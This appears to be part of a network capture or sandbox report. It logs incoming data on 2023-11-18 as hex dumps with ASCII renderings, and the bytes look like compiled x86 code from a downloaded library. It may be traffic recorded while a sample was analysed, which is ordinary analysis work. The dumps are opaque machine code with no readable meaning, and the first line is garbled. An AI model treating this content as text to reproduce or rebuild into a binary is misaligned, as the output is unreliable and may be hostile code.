0Ph9uKIh_^[]UMAHwL$zE@3]A8tHPEP3]A4@HPEP3]jq0M
2023-11-18 09:02:39 UTC	1054	IN	Data Raw: 18 02 8d 47 18 89 45 f8 74 23 8b 77 34 85 f6 74 1c 8b 4e 08 e8 e9 f8 00 00 ff 76 14 e8 a1 8f 0e 00 83 c4 04 56 e8 98 8f 0e 00 83 c4 04 8b 77 64 85 f6 74 70 8b 46 08 8b 5e 0c 85 c0 74 08 ff 76 04 ff d0 83 c4 04 83 3d c8 22 14 10 00 74 45 a1 e8 41 14 10 85 c0 74 0a 50 ff 15 18 23 14 10 83 c4 04 56 ff 15 f4 22 14 10 29 05 40 42 14 10 83 c4 04 ff 0d 64 42 14 10 56 ff 15 ec 22 14 10 a1 e8 41 14 10 83 c4 04 85 c0 74 13 50 ff 15 20 23 14 10 eb 07 56 ff 15 ec 22 14 10 83 c4 04 8b f3 85 db 75 90 ff 77 5c e8 46 de 0b 00 8b 77 58 83 c4 04 85 f6 74 58 83 3d c8 22 14 10 00 74 45 a1 e8 41 14 10 85 c0 74 0a 50 ff 15 18 23 14 10 83 c4 04 56 ff 15 f4 22 14 10 29 05 40 42 14 10 83 c4 04 ff 0d 64 42 14 10 56 ff 15 ec 22 14 10 a1 e8 41 14 10 83 c4 04 85 c0 74 18 50 ff 15 20 Data Ascii: GEt#w4tNvVwdtpF^tv="tEAtP#V")@BdBV"AtP #V"uw\FwXtX="tEAtP#V")@BdBV"AtP
2023-11-18 09:02:39 UTC	1057	IN	Data Raw: 89 44 24 30 0f 85 cd 00 00 00 8b ce e8 64 7b 00 00 85 c0 75 5f 50 6a 51 ff 74 24 2c ff 74 24 34 e8 30 bc fe ff 8b f8 8b da 33 c0 89 44 24 28 39 44 24 2c 7e 2f 8b 4c 24 30 8b f3 0f be 04 08 8b cf 0f a4 ce 03 99 c1 e1 03 03 f9 13 de 03 f8 8b 44 24 28 13 da 40 89 44 24 28 3b 44 24 2c 7c d5 8b 74 24 10 31 7c 24 1c 31 5c 24 14 8b 5c 24 14 8b 54 24 18 6a 00 6a 00 6a 00 8b ce e8 04 61 00 00 8b 54 24 24 83 c4 0c 8b ce e8 86 51 00 00 85 c0 0f 84 1e ff ff ff 8b 7c 24 1c 8b ca e8 03 65 00 00 8b 44 24 20 83 38 00 0f 85 bc 01 00 00 83 7c 24 44 00 0f 84 b1 01 00 00 39 7d 08 75 09 39 5d 0c 0f 84 a3 01 00 00 8b 5c 24 20 c7 03 0b 01 00 00 e9 98 01 00 00 33 c9 89 4c 24 58 8b 42 48 0f b7 40 04 8d 1c 40 c1 e3 05 03 da 8b 83 a8 00 00 00 83 c0 08 3b 44 24 5c 76 18 50 8d 54 24 Data Ascii: D$0d{u_PjQt$,t$403D$(9D$,~/L$0D$(@D$(;D$,\|t$1\|$1\$\$T$jjjaT$$Q\|$eD$ 8\|$D9}u9]\$ 3L$XBH@@;D$\vPT$
2023-11-18 09:02:39 UTC	1061	IN	Data Raw: 08 8b 40 0c 85 c0 74 0a 50 ff 15 20 23 14 10 83 c4 04 ff 75 e8 e8 f6 c1 0b 00 83 c4 04 8b 45 14 8b 5d dc 89 38 85 db 74 6a 83 3d c8 22 14 10 00 74 57 a1 e8 41 14 10 85 c0 74 0a 50 ff 15 18 23 14 10 83 c4 04 53 ff 15 f4 22 14 10 29 05 40 42 14 10 83 c4 04 ff 0d 64 42 14 10 53 ff 15 ec 22 14 10 a1 e8 41 14 10 83 c4 04 85 c0 74 25 50 ff 15 20 23 14 10 8b 46 24 83 c4 04 c7 46 24 00 00 00 00 5f 5e 5b 8b e5 5d c3 53 ff 15 ec 22 14 10 83 c4 04 8b 46 24 5f c7 46 24 00 00 00 00 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 e4 f8 83 ec 0c 53 56 57 ff 75 10 8b 39 8b c2 ff 75 0c 89 4c 24 18 6a 30 ff 75 08 89 44 24 24 ff 71 1c ff 71 18 8b 49 0c e8 9f 93 00 00 33 db 83 c4 18 8b f0 39 5f 18 7e 50 0f 1f 00 85 f6 75 47 8b 47 1c 8b 4d 0c 8b 55 10 ff 34 Data Ascii: @tP #uE]8tj="tWAtP#S")@BdBS"At%P #F$F$_^[]S"F$_F$^[]USVWu9uL$j0uD$$qqI39_~PuGGMU4
2023-11-18 09:02:39 UTC	1065	IN	Data Raw: 1c 8b 44 24 28 8b f8 8b 54 24 24 85 c0 0f 85 48 ff ff ff eb 04 8b 4c 24 1c 85 db 0f 84 c0 fe ff ff 83 7b 30 00 0f 84 b6 fe ff ff 8d 04 89 8b 4c 24 18 8d 54 24 44 8d 04 41 8b 4c 24 20 50 e8 48 f7 00 00 83 c4 04 85 c0 0f 85 9d fe ff ff ff 73 24 8d 73 20 89 44 24 4c 8b 43 30 8d 54 24 3c ff 36 8d 4c 24 4c 89 44 24 18 e8 cd f2 00 00 8b 53 14 8d 43 28 8b 4b 2c 56 50 e8 cd f3 00 00 83 c4 10 8d 4c 24 10 8b d3 e8 5f 03 00 00 8b 74 24 10 83 7e 30 00 8d 46 30 89 44 24 1c 0f 84 96 00 00 00 8b 4e 20 8d 5e 20 8b 43 04 89 74 24 28 3b 4c 24 38 75 06 3b 44 24 3c 74 12 50 51 8d 54 24 40 8d 4c 24 4c e8 72 f2 00 00 83 c4 08 8b 56 14 8d 46 28 8b 4e 2c 53 50 e8 6f f3 00 00 8b 74 24 24 83 c4 08 8b 13 8b 5b 04 8b 36 89 74 24 10 85 db 7c 34 7f 04 85 d2 72 2e 8d 4c 24 10 85 f6 74 Data Ascii: D$(T$$HL${0L$T$DAL$ PHs$s D$LC0T$<6L$LD$SC(K,VPL$_t$~0F0D$N ^ Ct$(;L$8u;D$<tPQT$@L$LrVF(N,SPot$$[6t$\|4r.L$t
2023-11-18 09:02:39 UTC	1069	IN	Data Raw: 24 28 8b f0 8b 44 24 74 d1 fe 03 74 24 38 89 74 24 38 8d 0c 07 03 ce 3b ca 7f 21 8b 44 24 10 03 44 24 20 56 50 8d 04 3b 50 e8 18 8d fe ff 83 c4 0c 03 fe 89 7c 24 68 e9 88 00 00 00 8b 4c 24 14 33 db 39 59 24 75 7d eb 04 8b 44 24 74 2b d7 2b f3 2b d0 3b f2 7e 12 8b 4c 24 10 03 4c 24 20 8d 0c 0b e8 bf 01 00 00 8b f0 8b 44 24 10 03 44 24 20 03 c3 56 50 8b 44 24 6c 03 c7 50 e8 c5 8c fe ff 8b 84 24 80 00 00 00 03 fe 8b 54 24 34 03 c7 83 c4 0c 89 7c 24 68 03 de 3b c2 7c 15 8b 4c 24 14 8d 54 24 58 e8 1c 14 00 00 8b 7c 24 68 8b 54 24 28 8b 74 24 38 3b de 7d 0a 8b 44 24 14 83 78 24 00 74 85 8b 4c 24 10 03 ce 89 4c 24 10 8b 54 24 2c 8b 74 24 74 8b 5c 24 14 83 c3 24 83 3b 00 0f 84 40 fd ff ff 83 3b 00 8b 74 24 24 8b 7c 24 14 75 24 8b 46 10 8b 40 04 89 46 10 eb 04 8b Data Ascii: $(D$tt$8t$8;!D$D$ VP;P\|$hL$39Y$u}D$t+++;~L$L$ D$D$ VPD$lP$T$4\|$h;\|L$T$X\|$hT$(t$8;}D$x$tL$L$T$,t$t\$$;@;t$$\|$u$F@F
2023-11-18 09:02:39 UTC	1073	IN	Data Raw: 00 8b 48 1c 8b 50 10 8b 06 8b 78 4c 8d 04 0a 03 45 0c 3b c7 7c 7d 2b fa 33 f6 2b f9 85 ff 7e 16 90 8d 0c 1e 8d 54 24 18 e8 14 28 ff ff 0f b6 c0 03 f0 3b f7 7c eb 8b 7c 24 0c 85 f6 74 32 8b 47 10 03 c6 3b 47 14 76 14 8b 4c 24 10 8d 57 0c 50 e8 2c d6 00 00 83 c4 04 85 c0 75 14 8b 47 0c 03 47 10 56 53 50 e8 57 7c fe ff 83 c4 0c 01 77 10 29 75 0c 03 de 8b 74 24 14 8b d7 8b ce e8 bf 03 00 00 83 7e 24 00 8d 4e 24 8b c7 0f 84 70 ff ff ff eb 04 8b 4c 24 10 8b 44 24 0c 8b 7d 0c 85 ff 7e 2f 8d 70 0c 8b 46 04 03 c7 3b 46 08 76 0f 50 8b d6 e8 ca d5 00 00 83 c4 04 85 c0 75 13 8b 06 03 46 04 57 53 50 e8 f6 7b fe ff 83 c4 0c 01 7e 04 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 0c 53 56 57 8b f9 8b f2 83 7f 24 00 8d 47 24 89 45 fc 0f 85 c9 00 00 00 8b Data Ascii: HPxLE;\|}+3+~T$(;\|\|$t2G;GvL$WP,uGGVSPW\|w)ut$~$N$pL$D$}~/pF;FvPuFWSP{~_^[]USVW$G$E
2023-11-18 09:02:39 UTC	1077	IN	Data Raw: 74 13 89 4f 34 8b 4d fc 83 4e 04 02 e8 4b 2a 00 00 33 db eb 10 8b 4d fc e8 2f 2e 00 00 33 db eb 04 c6 47 10 01 f6 46 04 02 74 09 c7 46 20 b0 11 03 10 eb 19 8b 45 fc b9 20 0d 03 10 ba 00 10 03 10 8b 00 83 78 30 01 0f 44 ca 89 4e 20 8b 45 0c 89 38 53 e8 74 30 0e 00 83 c4 04 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 18 53 8b d9 89 55 f0 33 c0 33 c9 56 8b 75 18 57 89 4d f8 89 45 fc 39 43 24 75 21 85 f6 79 0b 39 43 0c 0f 95 c1 03 4a 10 eb 0f 8b 4d 1c 8d 04 76 8b 44 82 1c 3b c1 0f 4c c8 89 4d f8 8b d1 8b cb e8 a6 0c 00 00 8b f8 8b 45 20 89 7d f4 89 38 85 ff 0f 84 59 02 00 00 8b 55 08 8b c2 c1 e8 04 8b ca 24 01 d1 e9 83 e1 01 88 47 38 8b 45 0c 89 4f 34 89 47 28 f6 c2 20 75 0d 8b d7 8d 4b 24 e8 38 02 00 00 8b 55 08 83 7b 24 00 0f 85 10 02 Data Ascii: tO4MNK*3M/.3GFtF E x0DN E8St0_^[]USU33VuWME9C$u!y9CJMvD;LME }8YU$G8EO4G( uK$8U{$
2023-11-18 09:02:39 UTC	1082	IN	Data Raw: c7 83 f0 01 8d 04 40 c1 e0 05 83 c0 50 03 c1 83 79 34 00 89 45 f8 74 09 33 c0 ba 00 00 00 80 eb 08 83 c8 ff ba ff ff ff 7f 89 41 40 8b 41 30 89 51 44 03 c7 99 2b c2 8b d8 8b 41 48 d1 fb 80 7c 98 02 00 8d 04 98 89 45 f4 74 5f 8b 45 f8 8b 7e 50 8b 76 54 8b 50 50 8b 40 54 3b fa 75 08 3b f0 0f 84 8b 00 00 00 3b c6 7c 0d 7f 04 3b d7 76 07 be 01 00 00 00 eb 02 33 f6 8b 79 34 3b f7 75 08 8b 75 f8 89 75 fc eb 1c 3b 41 44 7c 0e 7f 05 3b 51 40 76 07 be 01 00 00 00 eb 02 33 f6 3b f7 8b 75 fc 75 06 89 41 44 89 51 40 8b d6 b8 ab aa aa 2a 2b d1 83 ea 50 f7 ea c1 fa 04 8b c2 c1 e8 1f 03 c2 8b 55 f4 66 89 02 83 fb 01 74 30 8b 51 48 8b f3 83 f6 01 8b c3 0f b7 14 b2 8d 71 50 8d 14 52 c1 e2 05 03 f2 89 75 f8 8b 75 fc e9 43 ff ff ff 5f 5e b8 01 00 00 00 5b 8b e5 5d c3 8b 45 Data Ascii: @Py4Et3A@A0QD+AH\|Et_E~PvTPP@T;u;;\|;v3y4;uuu;AD\|;Q@v3;uuADQ@*+PUft0QHqPRuuC_^[]E
2023-11-18 09:02:39 UTC	1086	IN	Data Raw: 09 8b 47 0c 8b 40 04 40 eb 13 8d 0c 03 8d 55 08 e8 1d f8 fe ff 03 d8 8b 45 08 03 45 dc 8b 4d f8 8b d7 89 47 30 89 5f 2c e8 95 0c 00 00 8b 4d f8 8b d7 e8 0b 0d 00 00 5f 5e 5b 8b e5 5d c3 8b 45 f8 c7 40 24 0b 01 00 00 5f 5e 5b 8b e5 5d c3 cc cc cc 55 8b ec 51 53 56 8b f2 8b d9 57 8b 06 8b 56 04 8b 7e 24 83 e2 02 8b 00 89 45 fc 3b 7e 08 75 0e 8b 4e 0c 8b 46 30 3b 41 08 7c 12 8b 45 fc 57 50 8b cb e8 a9 0e 00 00 83 c4 08 89 46 40 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 1c 53 56 57 8b fa 8b f1 33 c0 89 7d e4 89 75 fc 89 45 f4 8b 4f 40 85 c9 74 5e 8b 07 33 f6 8b 59 18 89 5d f4 8b 00 99 8b c8 8b c3 c1 e1 05 99 03 f0 13 ca 51 56 8b 75 fc 8b ce e8 2c 29 00 00 83 c4 08 89 45 f8 85 c0 0f 84 27 01 00 00 8b 48 04 83 f9 04 7c 09 39 48 08 Data Ascii: G@@UEEMG0_,M_^[]E@$_^[]UQSVWV~$E;~uNF0;A\|EWPF@_^[]USVW3}uEO@t^3Y]QVu,)E'H\|9H
2023-11-18 09:02:39 UTC	1089	IN	Data Raw: 43 0c 89 4b 28 89 4b 18 8b 40 04 3b f0 7c 15 8b 4d f8 40 8b d3 89 43 30 e8 48 00 00 00 5f 5e 5b 8b e5 5d c3 8b 4d ec 8d 55 e8 8d 0c 0e e8 a3 eb fe ff 8b 4d f8 03 c6 89 43 2c 8b d3 8b 45 e8 01 43 30 e8 1e 00 00 00 5f 5e 5b 8b e5 5d c3 8b 45 f8 5f 5e 5b c7 40 24 0b 01 00 00 8b e5 5d c3 cc cc cc cc cc cc 55 8b ec 83 ec 0c 53 56 8b f2 57 8b f9 8b 46 0c 8b 5e 18 8b 08 8b 40 08 89 4d f8 8b 4e 1c 99 3b ca 7c 34 7f 04 3b d8 72 2e 8b d6 8b cf e8 5e 01 00 00 8b 46 0c 85 c0 75 13 39 47 24 75 37 c7 47 24 0b 01 00 00 5f 5e 5b 8b e5 5d c3 8b 00 bb 04 00 00 00 33 ff eb 05 8b 45 f8 8b f9 8d 56 50 8d 0c 03 e8 89 e9 fe ff 0f b6 c0 99 03 c3 89 46 18 13 d7 89 56 1c 5f 5e 5b 8b e5 5d c3 cc cc cc cc 55 8b ec 51 83 79 24 00 57 8b fa 0f 85 a9 00 00 00 8b 01 56 8b 77 18 8b d6 83 Data Ascii: CK(K@;\|M@C0H_^[]MUMC,EC0_^[]E_^[@$]USVWF^@MN;\|4;r.^Fu9G$u7G$_^[]3EVPFV_^[]UQy$WVw
2023-11-18 09:02:39 UTC	1093	IN	Data Raw: b8 01 00 00 00 88 0a eb 34 85 f6 77 24 72 08 81 f9 ff 3f 00 00 77 1a 8b c1 0f ac f0 07 0c 80 c1 ee 07 80 e1 7f 88 02 88 4a 01 b8 02 00 00 00 eb 0c 56 51 8b ca e8 86 d8 fe ff 83 c4 08 03 d8 89 5c 24 30 8b 54 24 18 8b 44 24 0c 42 8b 4c 24 14 83 c1 0c 89 54 24 18 89 4c 24 14 3b 10 0f 8c 1d fd ff ff 8b 4c 24 1c 83 c0 0c 8b 54 24 28 41 89 4c 24 1c 89 44 24 0c 3b 4a 14 0f 8c c0 fb ff ff 8b 4c 24 10 53 8b 5c 24 30 8b d3 6a 00 6a 0a e8 ac 0a 00 00 83 c4 0c 85 db 74 60 83 3d c8 22 14 10 00 74 4d a1 e8 41 14 10 85 c0 74 0a 50 ff 15 18 23 14 10 83 c4 04 53 ff 15 f4 22 14 10 29 05 40 42 14 10 83 c4 04 ff 0d 64 42 14 10 53 ff 15 ec 22 14 10 a1 e8 41 14 10 83 c4 04 85 c0 74 1b 50 ff 15 20 23 14 10 83 c4 04 5f 5e 5b 8b e5 5d c3 53 ff 15 ec 22 14 10 83 c4 04 5f 5e 5b 8b Data Ascii: 4w$r?wJVQ\$0T$D$BL$T$L$;L$T$(AL$D$;JL$S\$0jjt`="tMAtP#S")@BdBS"AtP #_^[]S"_^[
2023-11-18 09:02:39 UTC	1097	IN	Data Raw: f8 83 ec 0c 53 8b 5d 0c b8 0d 00 00 00 56 57 89 4c 24 10 8d 73 ff 85 f6 78 1b 8b 7d 08 0f b6 14 3e 8d 0c c5 00 00 00 00 33 d1 33 c2 83 ee 01 79 ec 8b 4c 24 10 33 d2 f7 71 0c 8b 41 14 8b 3c 90 85 ff 74 65 0f 1f 80 00 00 00 00 8b 47 14 40 3b d8 75 50 8b 45 08 8d 57 28 8b f3 83 ee 04 72 11 8b 0a 3b 08 75 10 83 c2 04 83 c0 04 83 ee 04 73 ef 83 fe fc 74 4e 8a 0a 3a 08 75 27 83 fe fd 74 43 8a 4a 01 3a 48 01 75 1a 83 fe fe 74 36 8a 4a 02 3a 48 02 75 0d 83 fe ff 74 29 8a 4a 03 3a 48 03 74 21 8b 3f 85 ff 75 a2 8b 45 10 c7 00 00 00 00 00 8b 45 14 c7 00 00 00 00 00 33 c0 5f 5e 5b 8b e5 5d c3 8b 47 10 8d 4b 29 2b c1 89 4c 24 0c 89 44 24 14 83 c0 16 99 8b f0 8b da e8 4a 59 04 00 85 c0 74 1e 8b 45 10 c7 00 00 00 00 00 8b 45 14 c7 00 00 00 00 00 b8 07 00 00 00 5f 5e 5b Data Ascii: S]VWL$sx}>33yL$3qA<teG@;uPEW(r;ustN:u'tCJ:Hut6J:Hut)J:Ht!?uEE3_^[]GK)+L$D$JYtEE_^[
2023-11-18 09:02:39 UTC	1101	IN	Data Raw: 00 00 0f 1f 40 00 8b 77 04 8b c6 8d 50 01 8a 08 40 84 c9 75 f9 2b c2 3b c3 74 06 7d 4f 38 0f 74 4b 8b 55 10 83 e8 04 72 11 8b 0e 3b 0a 75 10 83 c6 04 83 c2 04 83 e8 04 73 ef 83 f8 fc 74 36 8a 0e 3a 0a 75 27 83 f8 fd 74 2b 8a 4e 01 3a 4a 01 75 1a 83 f8 fe 74 1e 8a 4e 02 3a 4a 02 75 0d 83 f8 ff 74 11 8a 46 03 3a 42 03 74 09 8b 7f 0c 85 ff 75 93 eb 53 8b 74 24 1c 8b 5d 08 c7 44 24 1c 00 00 00 00 8b 46 08 8b 7b 08 83 c0 0f 8b 5b 0c 3b 46 0c 76 1e 50 8d 56 04 8d 4c 24 20 e8 64 66 00 00 83 c4 04 85 c0 74 0a 8b 44 24 1c 85 c0 75 3e eb 11 8b 54 24 24 8d 4e 04 53 57 e8 f5 61 00 00 83 c4 08 8b 5c 24 20 8b 55 08 8b 7c 24 10 8b 44 24 14 83 44 24 18 10 40 89 44 24 14 3b 47 10 7d 0b 8b 74 24 18 8b c8 e9 e9 fe ff ff 33 c0 5f 5e 5b 8b e5 5d c3 56 57 8b 39 33 f6 85 ff 7e Data Ascii: @wP@u+;t}O8tKUr;ust6:u't+N:JutN:JutF:BtuSt$]D$F{[;FvPVL$ dftD$u>T$$NSWa\$ U\|$D$D$@D$;G}t$3_^[]VW93~
2023-11-18 09:02:39 UTC	1314	IN	Data Raw: cc cc cc cc cc 89 51 14 c3 cc cc cc cc cc cc cc cc cc cc cc cc 53 56 8b f1 57 85 f6 0f 84 d6 00 00 00 33 ff 39 7e 08 7e 13 8d 5e 0c 8b 0b e8 72 03 00 00 47 8d 5b 04 3b 7e 08 7c f0 8b 7e 04 85 ff 74 58 83 3d c8 22 14 10 00 74 45 a1 e8 41 14 10 85 c0 74 0a 50 ff 15 18 23 14 10 83 c4 04 57 ff 15 f4 22 14 10 29 05 40 42 14 10 83 c4 04 ff 0d 64 42 14 10 57 ff 15 ec 22 14 10 a1 e8 41 14 10 83 c4 04 85 c0 74 18 50 ff 15 20 23 14 10 eb 07 57 ff 15 ec 22 14 10 83 c4 04 a1 e8 41 14 10 83 3d c8 22 14 10 00 74 45 85 c0 74 0a 50 ff 15 18 23 14 10 83 c4 04 56 ff 15 f4 22 14 10 29 05 40 42 14 10 83 c4 04 ff 0d 64 42 14 10 56 ff 15 ec 22 14 10 a1 e8 41 14 10 83 c4 04 85 c0 74 18 50 ff 15 20 23 14 10 83 c4 04 5f 5e 5b c3 56 ff 15 ec 22 14 10 83 c4 04 5f 5e 5b c3 cc cc cc Data Ascii: QSVW39~~^rG[;~\|~tX="tEAtP#W")@BdBW"AtP #W"A="tEtP#V")@BdBV"AtP #_^[V"_^[
2023-11-18 09:02:39 UTC	1330	IN	Data Raw: 0f 1f 44 00 00 8a 06 46 84 c0 75 f9 2b f1 33 c0 8b fe 83 c7 01 13 c0 89 44 24 0c e8 95 f6 03 00 85 c0 75 18 8b 4c 24 0c 8b c7 0b c1 74 0e 51 57 e8 40 80 0d 00 83 c4 08 8b f8 eb 02 33 ff 8b 45 0c 89 18 8b 45 08 89 18 85 ff 75 1c 8b 44 24 10 57 c7 00 07 00 00 00 e8 89 7e 0d 00 83 c4 04 8b c3 5f 5e 5b 8b e5 5d c3 8d 46 01 8b 74 24 14 50 56 57 e8 de b9 fd ff 8a 07 83 c4 0c 3c 22 74 23 3c 27 74 1f 3c 5b 74 1b 3c 60 74 17 8b ce e8 e2 07 00 00 8b d8 85 db 74 21 8b cf 2b ce c6 04 19 00 eb 13 8b cf e8 0b 06 00 00 8d 1c 06 8b 45 0c c7 00 01 00 00 00 85 db 75 12 57 e8 25 7e 0d 00 83 c4 04 8b c3 5f 5e 5b 8b e5 5d c3 8b 45 08 89 38 8b c3 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc 51 6a 00 52 6a 00 33 d2 e8 83 bf fe ff 83 c4 0c 59 c3 cc cc cc cc cc cc cc cc Data Ascii: DFu+3D$uL$tQW@3EEuD$W~_^[]Ft$PVW<"t#<'t<[t<`tt!+EuW%~_^[]E8_^[]QjRj3Y
2023-11-18 09:02:39 UTC	1346	IN	Data Raw: 08 ff 76 04 8b 40 1c ff d0 8b d8 83 c4 04 89 5d 08 85 db 74 75 8b 5f 08 85 db 74 55 83 3d c8 22 14 10 00 74 42 a1 e8 41 14 10 85 c0 74 0a 50 ff 15 18 23 14 10 83 c4 04 53 ff 15 f4 22 14 10 29 05 40 42 14 10 ff 0d 64 42 14 10 53 ff 15 ec 22 14 10 a1 e8 41 14 10 83 c4 08 85 c0 74 13 50 ff 15 20 23 14 10 eb 07 53 ff 15 ec 22 14 10 83 c4 04 8b 47 0c ff 70 08 68 10 8c 12 10 e8 d4 13 0d 00 8b 5d 08 83 c4 08 89 47 08 8b 4e 0c 85 c9 74 06 8b 46 08 89 41 08 8b 4e 08 8b 46 0c 56 89 01 e8 40 3e 0d 00 83 c4 04 8b c3 5f 5e 5b 5d c3 cc cc cc cc cc cc 55 8b ec 83 e4 f8 51 53 8b 5d 0c 56 57 8b 7d 08 8b 47 10 c7 03 00 00 00 00 89 44 24 0c 83 78 14 00 74 0c b8 01 00 00 00 5f 5e 5b 8b e5 5d c3 e8 cc b5 03 00 85 c0 0f 85 90 00 00 00 50 6a 10 e8 7c 3f 0d 00 8b f0 83 c4 08 85 Data Ascii: v@]tu_tU="tBAtP#S")@BdBS"AtP #S"Gph]GNtFANFV@>_^[]UQS]VW}GD$xt_^[]Pj\|?
2023-11-18 09:02:39 UTC	1348	IN	Data Raw: c0 75 f9 5f 2b ce 8b c3 5e 89 0a 5b 5d c2 2c 00 33 c9 89 0a 5f 5e 8b c3 5b 5d c2 2c 00 cc cc cc cc cc cc cc cc 55 8b ec 8b 55 0c 8b 4d 08 56 6a 04 6a 01 e8 cd 67 0a 00 8b 75 10 83 c4 08 8b d0 85 f6 74 32 85 d2 74 28 8b ca 57 8d 79 02 0f 1f 80 00 00 00 00 66 8b 01 83 c1 02 66 85 c0 75 f5 2b cf 8b c2 d1 f9 03 c9 5f 89 0e 5e 5d c2 0c 00 33 c9 8b c2 89 0e 5e 5d c2 0c 00 cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 55 0c 8b 4d 08 56 6a 04 6a 00 e8 6d 67 0a 00 8b 75 10 83 c4 08 8b d0 85 f6 74 2a 85 d2 74 20 8b ca 57 8d 79 01 0f 1f 80 00 00 00 00 8a 01 41 84 c0 75 f9 2b cf 8b c2 5f 89 0e 5e 5d c2 0c 00 33 c9 8b c2 89 0e 5e 5d c2 0c 00 cc cc 55 8b ec 8b 55 0c 8b 4d 08 56 6a 03 6a 01 e8 1d 67 0a 00 8b 75 10 83 c4 08 8b d0 85 f6 74 32 85 d2 74 28 8b ca 57 8d 79 02 0f Data Ascii: u_+^[],3_^[],UUMVjjgut2t(Wyffu+_^]3^]UUMVjjmgut*t WyAu+_^]3^]UUMVjjgut2t(Wy
2023-11-18 09:02:39 UTC	1380	IN	Data Raw: 38 8b 08 56 57 0f b7 41 08 83 e0 3f 80 b8 38 bc 13 10 05 0f 84 b8 00 00 00 0f b7 41 08 a8 08 74 06 f2 0f 10 01 eb 1e a8 24 74 0c 8b 51 04 8b 09 e8 80 2f 0d 00 eb 0e a8 12 74 07 e8 35 bd 0a 00 eb 03 0f 57 c0 f2 0f 11 44 24 38 e8 82 2f fc ff c7 00 00 00 00 00 e8 77 2f fc ff 83 38 00 75 34 dd 44 24 38 e8 35 19 fc ff f2 0f 10 05 f0 cc 13 10 83 ec 08 dd 5c 24 40 f2 0f 5e 44 24 40 f2 0f 11 04 24 ff 75 08 e8 ca 3d 0a 00 83 c4 0c 5f 5e 8b e5 5d c3 e8 39 2f fc ff 8b 38 e8 32 2f fc ff ff 30 e8 f8 46 fc ff 8b 4d 08 83 c4 04 8b f0 8b c7 99 6a ff 6a 01 52 c7 41 14 01 00 00 00 8b d6 8b 09 50 e8 6d b2 0a 00 83 c4 10 5f 5e 8b e5 5d c3 8b 45 08 b9 00 24 00 00 8b 00 66 85 48 08 74 0d 8b c8 e8 0d be 0a 00 5f 5e 8b e5 5d c3 b9 01 00 00 00 5f 66 89 48 08 5e 8b e5 5d c3 cc cc Data Ascii: 8VWA?8At$tQ/t5WD$8/w/8u4D$85\$@^D$@$u=_^]9/82/0FMjjRAPm_^]E$fHt_^]_fH^]
2023-11-18 09:02:39 UTC	1396	IN	Data Raw: dd 01 00 00 8b 41 04 3b 42 04 0f 85 d1 01 00 00 68 50 0f 13 10 ff d7 68 02 08 00 00 8d 84 24 ac 01 00 00 6a 00 50 e8 6a c4 fb ff 83 c4 0c 8d 84 24 a8 01 00 00 68 00 04 00 00 50 68 74 0f 13 10 ff 15 68 80 11 10 8b 4c 24 28 85 c0 8b 01 0f 84 40 01 00 00 8d 94 24 88 00 00 00 c7 84 24 88 00 00 00 00 00 00 00 8b 40 24 52 51 ff d0 8b f0 85 f6 79 0c 68 a0 0f 13 10 ff d7 e9 8e 01 00 00 68 02 08 00 00 8d 84 24 b4 09 00 00 6a 00 50 e8 02 c4 fb ff 83 c4 0c ff 15 88 80 11 10 50 ff b4 24 8c 00 00 00 ff 15 10 81 11 10 50 8d 84 24 bc 09 00 00 68 c0 0f 13 10 50 ff 15 18 82 11 10 83 c4 14 8d 84 24 a8 01 00 00 68 02 08 00 00 6a 00 50 e8 c0 c3 fb ff 83 c4 0c 8d 84 24 a8 01 00 00 68 00 04 00 00 50 8d 84 24 b8 09 00 00 50 ff 15 68 80 11 10 85 c0 75 13 68 f0 0f 13 10 ff d7 a1 Data Ascii: A;BhPh$jPj$hPhthL$(@$$@$RQyhh$jPP$P$hP$hjP$hP$Phuh
2023-11-18 09:02:39 UTC	1412	IN	Data Raw: 0c 38 47 89 7c 24 44 83 46 08 02 8b 5c 24 14 8b 74 24 18 8b d6 8b 4c 24 1c 6a 00 53 6a 00 e8 f2 10 00 00 83 c4 0c 89 44 24 24 89 44 24 10 85 c0 75 1d 8b 4c 24 1c 8b d6 50 8d 04 b3 50 6a 00 e8 d1 10 00 00 83 c4 0c 89 44 24 24 89 44 24 10 8b 4c 24 18 33 f6 85 c9 7e 3b 8b f9 8d 44 24 10 33 c9 50 8b 44 24 24 8b d7 38 0c 06 0f 45 d1 8d 4c 24 44 03 d6 8b 14 93 e8 79 31 00 00 46 83 c4 04 3b f7 7c d7 8b 44 24 10 8b 7c 24 44 8b 4c 24 18 89 44 24 24 33 f6 85 c9 0f 8e 9a 00 00 00 8b 4c 24 20 0f 1f 00 80 3c 0e 00 74 04 33 db eb 03 8b 1c b3 85 c0 75 73 8d 44 24 30 0f 57 c0 50 8b d3 66 0f 13 44 24 34 33 c9 e8 a8 5d 00 00 83 c4 04 89 44 24 10 85 c0 75 49 8b c7 8d 4c 24 40 99 03 44 24 30 13 54 24 34 52 50 8d 54 24 18 e8 83 31 00 00 8b 44 24 18 83 c4 08 8b 7c 24 44 85 c0 Data Ascii: 8G\|$DF\$t$L$jSjD$$D$uL$PPjD$$D$L$3~;D$3PD$$8EL$Dy1F;\|D$\|$DL$D$$3L$ <t3usD$0WPfD$43]D$uIL$@D$0T$4RPT$1D$\|$D
2023-11-18 09:02:39 UTC	1444	IN	Data Raw: 75 08 50 52 68 90 04 13 10 e8 87 0c 0c 00 83 c4 18 5d c3 cc cc 55 8b ec 83 ec 08 53 56 57 8b d9 89 55 f8 33 c0 33 ff 33 f6 89 45 fc ba bc 7d 12 10 85 db 7e 58 8b 4d 0c 8b 45 14 80 3c 06 00 75 37 8b 45 10 c7 45 fc 01 00 00 00 8b 04 b0 50 51 ff 75 08 50 51 ff 75 f8 52 57 68 58 04 13 10 e8 31 0c 0c 00 8b f8 83 c4 24 ba 84 04 13 10 85 ff 74 12 8b 4d 0c 8b 45 14 46 3b f3 7c be 8b 45 fc 85 c0 74 09 8b c7 5f 5e 5b 8b e5 5d c3 68 90 9d 12 10 e8 fe 0b 0c 00 83 c4 04 5f 5e 5b 8b e5 5d c3 cc cc cc cc 55 8b ec 51 53 56 57 8b d9 89 55 fc 33 ff 33 f6 ba bc 7d 12 10 85 db 7e 42 8b 4d 0c 8b 45 14 90 80 3c 06 00 74 30 8b 45 